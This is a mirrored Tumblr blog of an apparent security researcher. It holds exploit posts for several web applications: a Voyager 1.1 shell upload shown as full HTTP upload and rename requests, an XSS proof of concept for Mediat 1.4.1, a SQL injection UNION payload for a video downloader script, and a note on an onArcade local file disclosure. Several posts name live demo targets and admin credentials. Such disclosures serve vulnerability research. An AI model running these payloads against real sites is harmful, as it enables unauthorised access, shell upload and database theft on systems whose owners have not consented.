Tumgik
deyaamuhammad
DEYAA
6 posts
Don't wanna be here? Send us removal request.
Last Seen Blogs
artyry
dhalsims
Dhalsims
fuckyeahjurischewe-blog
Fuck Yeah Juri Schewe
emmanuelgomez764-blog
Untitled
ilovethedough
F4$TLANE..
deyaamuhammad · 6 years
Text
Voyager 1.1 Shell Upload
# Exploit Title: Voyager 1.1 - Arbitrary File Upload # Google Dork: N/A # Date: 1 Jan 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Poc Video: https://youtu.be/5GnHbFqRP9M # Vendor Homepage: https://laravelvoyager.com/ # Software Link: https://github.com/the-control-group/voyager # Demo Website: http://demo.meteorsa.com/Beemedia # Demo Admin Panel: http://demo.meteorsa.com/Beemedia/admin # Demo Admin Credentials: [email protected]/password # Version: 1.1.11 # Tested on: WIN7_x68/Linux2.6.32-896.16.1.lve1.4.54.el6.x86_64 # CVE : N/A
# Description You could be able to bypass .htaccess extensions restrictions by renaming the shell.png to shell.php5, This exploit happen due to laravel and voyager extensions filter failure.
#Upload Request
POST /Beemedia/admin/media/upload HTTP/1.1 Host: demo.meteorsa.com Connection: keep-alive Content-Length: 1203 Accept: application/json Cache-Control: no-cache Origin: http://demo.meteorsa.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBfiKW54AxLABftaB Referer: http://demo.meteorsa.com/Beemedia/admin/media Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: XSRF-TOKEN=eyJpdiI6ImhMWXRCQVwvTVlLbTRkYVFpSzZmYWRBPT0iLCJ2YWx1ZSI6InQxUlFvZWFHeFhPUm02dUxMYzBUaVY4aUFXREZwV3JvQ01rb0VJOFdOQ1wvM2tLdWFLZWVORms1YzMyaU9TUDdDIiwibWFjIjoiMDk5YzNkMmNkZmEyMGJmNGM4Njc0NDg3ZjY3OWIyMzBlMGE3MTFhZDI2OWNhNmZmZWI0MjdiZTdmNDViYzg1MSJ9; laravel_session=eyJpdiI6ImNyc3F6UEJONlhtdHBoQXlxbXdOdlE9PSIsInZhbHVlIjoiU0piSGlGN2tETU1oem9KU3RscVlhb0NIWUxTN01UWjhRMnJ2ZXgwRjZ1dlFMQ1FRVnZiUVh1Q1Q5RUhFXC9PM2siLCJtYWMiOiI2NGE4OWFiNTlhOTQ5MjY1ZmZlZjViMzJhZjI1OTk5MDNhZGI5ZmQ2OGQ4NTJiYWI0ZTE4NmE4MjhlYzUyOGFhIn0%3D
------WebKitFormBoundaryBfiKW54AxLABftaB Content-Disposition: form-data; name="_token"
of3KiGsiLLx5meVLJLocDCZjj7uZxWGQdG43LCbC ------WebKitFormBoundaryBfiKW54AxLABftaB Content-Disposition: form-data; name="upload_path"
------WebKitFormBoundaryBfiKW54AxLABftaB Content-Disposition: form-data; name="file"; filename="wv.png" Content-Type: image/png
------WebKitFormBoundaryBfiKW54AxLABftaB--
#Rename Request
POST /Beemedia/admin/media/rename_file HTTP/1.1 Host: demo.meteorsa.com Connection: keep-alive Content-Length: 157 Accept: */* Origin: http://demo.meteorsa.com X-CSRF-TOKEN: of3KiGsiLLx5meVLJLocDCZjj7uZxWGQdG43LCbC X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://demo.meteorsa.com/Beemedia/admin/media Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: XSRF-TOKEN=eyJpdiI6IjU1TXZaVVZoUmFXcFpIcXBWKzE2T2c9PSIsInZhbHVlIjoiV1hLTVwvbk9ZVGRLY3ErUlJoNlwvRlV0TkpIcTJOSFwvQnI2WFltdEFyWTZzZEtRdENreXFLbG1EcFR0WmlONUhkMCIsIm1hYyI6ImM2YzQwZTdiOGYzMDQ1MTE1MjE4MjJhMDkzZTcwYWM1ZmU5ZmY0MmYzZTQ1YjEwODZlOGIzMjA3ZTE4ODZkOGIifQ%3D%3D; laravel_session=eyJpdiI6IksyS2xBczMrdlJ4SHdtVDN0QWhLR1E9PSIsInZhbHVlIjoiNHZvU0wzeEF5MkpcLzlONEFvN09XMXlZSkljbDFJVHo0aE81aGtOSm1QaHBZUmpZaHNndmJmeUZqVFdtS1lycHMiLCJtYWMiOiIzZWI5YjNhOGFkNWU4YjdiZjNkM2FhMDFlODY4MjkyMDk3NjdlZTQ4YjMwYjE1MTEyZDM3YzU1NzAyYjNlYTEyIn0%3D filename=LWVxh2eHAtZYxigmkPVzSeB5YdclRG5ogwqEp0lA.&new_filename=LWVxh2eHAtZYxigmkPVzSeB5YdclRG5ogwqEp0lA.php5&_token=of3KiGsiLLx5meVLJLocDCZjj7uZxWGQdG43LCbC
#References: https://packetstormsecurity.com/files/150963/Voyager-1.1-Shell-Upload.html
#exploit#voyager#laravel#shell upload
0 notes
deyaamuhammad · 6 years
Text
Mediat 1.4.1 - Cross-site Scripting
Tumblr media
# Exploit Title: Mediat 1.4.1 - Cross-site Script # Google Dork: N/A # Date: 1 Jan 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Vendor Homepage: http://webfairy.net/ # Software Link: https://github.com/WebFairyNet/Mediat # Demo Website: http://mediat.webfairy.net/ # Version: 1.4 # Tested on: WIN7_x68/Linux # CVE : N/A
# Description: A XSS found in "WebFairy Mediat 1.4.1" search section.
# POC Request: http://[PATH]/search.html?query="><script>alert('Deyaa')</script>
#Live Target: http://mediat.webfairy.net/arabic_demo/search.html?query="><script>alert('Deyaa')</script>
References: https://packetstormsecurity.com/files/150962/WebFairy-Mediat-1.4.1-Cross-Site-Scripting.html
#exploit#xss#cross-site scripting
0 notes
deyaamuhammad · 6 years
Text
All in One Video Downloader 1.2 - SQL Injection
Tumblr media
# Exploit Title: All in One Video Downloader 1.2 - SQL Injection # Google Dork: "developed by Niche Office" # Date: 1 Jan 2019 # Exploit Author: Deyaa Muhammad # Author EMail: contact [at] deyaa.me # Author Blog: http://deyaa.me # Vendor Homepage: https://nicheoffice.web.tr/ # Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418 # Demo Website: https://aiovideodl.ml/ # Demo Admin Panel: https://aiovideodl.ml/admin/ # Demo Admin Credentials: [email protected]/123456 # Version: 1.2 # Tested on: WIN7_x68/cloudflare # CVE : N/A
# POC: https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- -
# Exploit: https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -
#Live Target: https://aiovideodl.ml/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -
# References: https://packetstormsecurity.com/files/150955/All-In-One-Video-Downloader-1.2-SQL-Injection.html
#exploit#sql injection#sqli#webapp
0 notes
deyaamuhammad · 8 years
Text
onArcade 2.4.x Local File Disclosure
Tumblr media
[1] INTRO onArcade is a nice PHP CMS Software that handle videos and online games content,there is no enough filtering for template file handler, which leads to a Local File Disclosure  vulnerability.
[2] Vulnerable Versions onArcade 2.4.2 onArcade 2.4.1 onArcade 2.4.0 [3] Bug Track Because of the special treatment for .php extension, we wont be able to read the files with php extension But , you may use Null-Byte to bypass this problem and "drop" the extension in file path when PHP <= 5.3.4. [4] POC Video
youtube
[5] Links https://packetstormsecurity.com/files/141792/onArcade-2.4.x-Local-File-Disclosure.html http://0day.today/exploit/description/27410
#exploit#video#onarcade
0 notes
deyaamuhammad · 8 years
Video
Using Cisco Packet Tracer under Ubuntu
#video#cisco#packet tracer#note
0 notes
deyaamuhammad · 8 years
Text
Hello World
Hello world,
In my short life, I've gain skills take and left a lot of hobbies.  I have never been interested in blogging, internet communities.
I always saw it as  the more you are obvious on the internet the more people can break into your life and privacy easily.
Finally I've realized 
Blogging and sharing your thought over internet maybe not that bad, due to the fact that i like computers more than people so i think it’s better to share your thoughts with people over computers.
#blog#hello world
0 notes
Statistics
We looked inside some of the posts by deyaamuhammad and here's what we found interesting.
Average Info
Notes Per Post
0
Likes Per Post
0
Reblog Per Post
0
Reply Per Post
0
Time Between Posts
5 months
Number of Posts By Type
Text
5
Video
1
Explore Tagged Posts
Fun Fact
Mobile Tumblr US users spend an average of 4.04 minutes per session on the app.